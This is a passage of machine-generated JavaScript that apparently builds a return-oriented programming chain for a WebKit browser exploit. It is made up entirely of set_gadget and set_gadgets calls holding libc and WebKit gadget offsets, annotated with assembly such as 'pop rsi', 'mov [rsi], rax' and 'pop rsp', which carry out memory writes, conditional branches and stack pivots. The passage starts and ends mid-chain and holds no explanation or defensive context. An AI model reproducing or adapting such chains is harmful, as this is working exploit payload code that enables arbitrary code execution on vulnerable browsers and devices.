//L4707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+255376, //L4705 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4705: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4706: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4707: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+255552, //L4710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255568, //L4711 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+255520, //L4708 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4708: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4709: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4710: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4711: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+255640, //L4712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4712: db([0, 0]); // 0x0 //L4684: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+255768, //L4715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255784, //L4716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+255752, //L4714 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4714: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4715: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L4716: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+255896, //L4718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255944, //L4721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+255912, //L4719 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4718: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4719: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4720: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4721: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+256056, //L4722+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+256048, //L4722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4722: db([0, 0]); // 0x0 set_gadgets([ ropchain+256072, //L4722+24 ropchain+258080, //L4717 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+256112, //L4723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4723: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4724: db([98, 0]); // 0x62 set_gadget(libc_base+144605,); //pop rdi //L4725: db([98, 0]); // 0x62 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+256304, //L4729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+256272, //L4727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+256288, 
//L4728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4726: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4727: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4728: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4729: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+256360, //L4731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4731: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+256488, //L4733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+256504, //L4734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+256472, //L4732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4732: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4733: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4734: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+256600, //L4736 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+256584, //L4735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4735: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4736: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+256680, //L4737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4737: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop 
rsi //L4739: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+256800, //L4742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+256784, //L4740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4740: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4742: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+256944, //L4745 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+256912, //L4743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+256928, //L4744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4743: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4744: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4745: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+257016, //L4747 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4747: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+257072, //L4748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4748: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+257152, //L4750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4750: db([0, 0]); 
// 0x0 set_gadget(libc_base+764760,); //pop rsi //L4752: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+257272, //L4755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+257256, //L4753 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4753: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4755: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+257416, //L4758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+257384, //L4756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+257400, //L4757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4756: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4757: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4758: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+257504, //L4760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4759: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4760: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+257560, //L4761 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4761: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4763: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+257640, //L4765 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4765: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+257744, //L4766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+257760, //L4767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4766: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4767: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+257848, //L4769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4769: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+257904, //L4770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4770: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+257976, //L4773 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4773: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+258032, //L4774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4774: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] 
libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L4717: //L4659: //L4505: libc_base+764760, //pop rsi ropchain+258120, //L4776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4776: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4778: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+258240, //L4781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+258224, //L4779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4779: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4781: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+258384, //L4784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+258352, //L4782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+258368, //L4783 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4782: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4783: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4784: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+258480, //L4786 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4785: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4786: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4787: db([32, 0]); // 0x20 set_gadgets([ 
libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+258584, //L4788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+258600, //L4789 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4788: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4789: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+258776, //L4791 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+258792, //L4792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+258760, //L4790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4790: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4791: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4792: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+258904, //L4794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+258952, //L4797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+258920, //L4795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4794: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4795: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4796: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4797: db([0, 0]); // 
0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+259064, //L4798+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+259056, //L4798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4798: db([0, 0]); // 0x0 set_gadgets([ ropchain+259080, //L4798+24 ropchain+261088, //L4793 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+259120, //L4799 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4799: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4800: db([48, 0]); // 0x30 set_gadget(libc_base+144605,); //pop rdi //L4801: db([48, 0]); // 0x30 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+259312, //L4805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+259280, //L4803 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+259296, //L4804 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4802: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4803: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4804: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4805: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+259368, //L4807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4807: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+259496, //L4809 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, 
//pop rsi ropchain+259512, //L4810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+259480, //L4808 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4808: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4809: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4810: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+259608, //L4812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+259592, //L4811 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4811: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4812: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+259688, //L4813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4813: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4815: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+259808, //L4818 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+259792, //L4816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4816: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4818: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+259952, //L4821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+259920, //L4819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+259936, //L4820 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4819: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4820: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4821: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+260024, //L4823 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4823: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+260080, //L4824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4824: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+260160, //L4826 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4826: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4828: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+260280, //L4831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+260264, //L4829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4829: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4831: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+260424, //L4834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+260392, //L4832 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+260408, //L4833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4832: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4833: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4834: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+260512, //L4836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4835: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4836: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+260568, //L4837 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4837: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4839: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+260648, //L4841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4841: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+260752, //L4842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+260768, //L4843 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4842: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4843: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); 
db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+260856, //L4845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4845: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+260912, //L4846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4846: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+260984, //L4849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4849: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+261040, //L4850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4850: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L4793: //L4111: libc_base+764760, //pop rsi ropchain+261128, //L4852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4852: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4854: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+261248, //L4857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+261232, //L4855 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); 
//L4855: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4857: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+261392, //L4860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+261360, //L4858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+261376, //L4859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4858: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4859: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4860: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+261488, //L4862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4861: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4862: 